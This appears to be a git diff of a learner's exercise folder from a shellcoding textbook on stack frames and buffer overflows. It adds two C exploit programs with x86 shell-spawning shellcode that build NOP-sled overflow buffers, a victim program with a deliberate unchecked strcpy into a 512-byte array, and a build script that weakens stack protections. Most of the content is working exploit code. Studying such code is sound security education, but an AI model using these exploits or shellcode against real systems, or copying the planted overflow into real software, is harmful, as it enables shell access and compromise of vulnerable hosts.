diff --git a/shellcoders_handbook/funcs_and_stacks/exploit.c b/shellcoders_handbook/funcs_and_stacks/exploit.c new file mode 100644 index 0000000..1490c99 --- /dev/null +++ b/shellcoders_handbook/funcs_and_stacks/exploit.c @@ -0,0 +1,49 @@ +#include +#include +#include + +#define offset_size 0 +#define buffer_size 512 + +//char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"; + +char sc[] = + "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" + "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" + "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; + +unsigned long find_start(void){ + __asm__("movl %esp,%eax"); +} + +int main(int argc, char *argv[]){ + + char *buff, *ptr; + long *addr_ptr, addr; + int offset=offset_size, bsize=buffer_size; + + if (argc > 1) bsize = atoi(argv[1]); + if (argc > 2) offset = atoi(argv[2]); + + addr = find_start() - offset; + printf("Attempting address: 0x%x\n", addr); + printf("ADDR %x", addr); + ptr = buff; + addr_ptr = (long *)ptr; + + for (int i=0; i < bsize; i += 4){ + //printf("ADDR %s", addr); + *(addr_ptr++) = addr; + } + ptr += 4; + + for (int i=0; i < strlen(sc); i++) + *(ptr++) = sc[i]; + + buff[bsize - 1] = '\0'; + memcpy(buff, "BUF=", 4); + putenv(buff); + system("/bin/bash"); + + return 0; +} diff --git a/shellcoders_handbook/funcs_and_stacks/exploit_nops.c b/shellcoders_handbook/funcs_and_stacks/exploit_nops.c new file mode 100644 index 0000000..49aa347 --- /dev/null +++ b/shellcoders_handbook/funcs_and_stacks/exploit_nops.c @@ -0,0 +1,52 @@ +#include +#include +#include + +#define DEFAULT_OFFSET 0 +#define DEFAULT_BUFFER_SIZE 512 +#define NOP 0x90 + +char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"; + +/*char shellcode[] = +"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46" +"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1" +"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; +*/ + +unsigned long get_sp(void) { + __asm__("movl %esp,%eax"); +} +void main(int argc, char *argv[]){ + char *buff, *ptr; + long *addr_ptr, addr; + int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; + int i; + + if (argc > 1) bsize = atoi(argv[1]); + if (argc > 2) offset = atoi(argv[2]); + if (!(buff = malloc(bsize))) { + printf("Can’t allocate memory.\n"); + exit(0); + } + + addr = get_sp() - offset; + printf("Using address: 0x%x\n", addr); + ptr = buff; + addr_ptr = (long *) ptr; + + for (i = 0; i < bsize; i+=4) + *(addr_ptr++) = addr; + + for (i = 0; i < bsize/2; i++) + buff[i] = NOP; + ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); + + for (i = 0; i < strlen(shellcode); i++) + *(ptr++) = shellcode[i]; + + buff[bsize - 1] = '\0'; + memcpy(buff,"BUF=",4); + putenv(buff); + system("/bin/bash"); + } diff --git a/shellcoders_handbook/funcs_and_stacks/function.c b/shellcoders_handbook/funcs_and_stacks/function.c new file mode 100644 index 0000000..089e562 --- /dev/null +++ b/shellcoders_handbook/funcs_and_stacks/function.c @@ -0,0 +1,10 @@ +#include + +function(int a, int b){ + int array[5]; +} + +main(){ + function(1, 2); + printf("This is where the return address points"); +} diff --git a/shellcoders_handbook/funcs_and_stacks/run.sh b/shellcoders_handbook/funcs_and_stacks/run.sh new file mode 100755 index 0000000..9cfb2dc --- /dev/null +++ b/shellcoders_handbook/funcs_and_stacks/run.sh @@ -0,0 +1,9 @@ +#!/usr/bin/env bash + +file=$1 +# -gddb; compile gdb output used for debugging +# -mpreferred-stack-boundary ; will setup our stack into dword size increments. +# Otherwise gcc will optimize the stack and make things more difficult then they need to be at this point. +cc -mpreferred-stack-boundary=2 -ggdb "$file".c -o "$file" + +#gcc -fno-stack-protector -z execstack "$file".c -o "$file" diff --git a/shellcoders_handbook/funcs_and_stacks/victim.c b/shellcoders_handbook/funcs_and_stacks/victim.c new file mode 100644 index 0000000..d87bf74 --- /dev/null +++ b/shellcoders_handbook/funcs_and_stacks/victim.c @@ -0,0 +1,9 @@ +#include +#include + +int main(int argc, char *argv[]){ + char little_array[512]; + if (argc > 1) + strcpy(little_array, argv[1]); + return 0; +}